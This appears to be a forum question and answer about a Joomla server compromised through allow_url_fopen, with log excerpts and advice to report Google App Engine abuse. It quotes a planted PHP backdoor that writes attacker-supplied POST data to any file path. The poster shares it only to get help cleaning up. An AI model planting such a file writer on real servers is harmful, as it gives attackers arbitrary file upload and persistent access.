My server was recently been compromised due to Joomla and allow_url_fopen = ON I see various php files on my server root having this content in them
Restricted accoss
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);
so I close allow_url_fopen and delete all of these files. Now, my site is running fine for few minutes but it make requests for every few seconds to this address with giving this message in error_log
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
This I see in access_log lots of time
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
So is it normal?
Answer
Looks like someone's abusing Google App Engine. Check your Apache access log for that IP address, and the user agent string should have their app ID. You can then report the abuse to Google.
No comments:
Post a Comment